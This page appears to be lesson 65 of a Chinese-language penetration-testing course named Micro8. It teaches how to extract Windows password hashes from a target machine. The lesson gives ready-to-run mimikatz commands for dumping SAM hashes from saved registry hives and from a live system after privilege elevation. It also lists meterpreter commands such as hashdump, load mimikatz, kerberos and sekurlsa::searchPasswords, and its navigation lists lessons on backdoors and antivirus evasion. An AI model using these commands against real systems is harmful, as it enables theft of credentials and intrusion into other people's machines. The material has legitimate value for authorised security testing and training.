Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
41-50课
51-60课
61-70课
第六十一课:高级持续渗透-第五季关于后门
第六十二课:高级持续渗透-第六季关于后门
第六十三课:高级持续渗透-第七季demo的成长
第六十四课:高级持续渗透-第八季demo便是远控
第六十五课:离线提取目标机hash补充
第六十六课:借助aspx对payload进行分离免杀
第六十七课:meterpreter下的irb操作第一季
第六十八课:基于Ruby内存加载shellcode第一季
第六十九课:渗透,持续渗透,后渗透的本质
第七十课:ftp一句话下载payload补充
71-80课
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered By
GitBook
第六十五课:离线提取目标机hash补充
上一季下载sys.hiv,sam.hiv,security.hiv文件后,以Linux下为背景来离线提取hash,本季补充以windows为背景离线提取hash。
mimikatz 2.0 二进制文件下载地址:
https://github.com/gentilkiwi/mimikatz/releases/latest
切到当下目录(注意X86,X64位)
mimikatz离线导hash命令:
1
mimikatz.exe
"lsadump::sam /system:sys.hiv /sam:sam.hiv"
exit
Copied!
mimikatz在线导hash命令:
1
mimikatz.exe
"log Micropoor.txt"
"privilege::debug"
"token::elevate"
"lsadump::sam"
"exit"
Copied!
当然关于提取目标机的hash,msf也内置了离线提取与在线提取hash。
meterpreter下hashdump命令来提取hash(注意当前权限)
msf同时也内置了mimikatz,meterpreter执行load mimikatz即可加载该插件。
(这里一定要注意,msf默认调用于payload位数相同的mimikatz)
直接执行kerberos即可。
当然有些情况下,payload位数无误,权限无误,依然无法提取目标机的密码相关。需要调用mimikatz自定义命令:
1
mimikatz_command -f sekurlsa::searchPasswords
Copied!
Micropoor
Previous
第六十四课:高级持续渗透-第八季demo便是远控
Next
第六十六课:借助aspx对payload进行分离免杀
Last modified
3yr ago
Copy link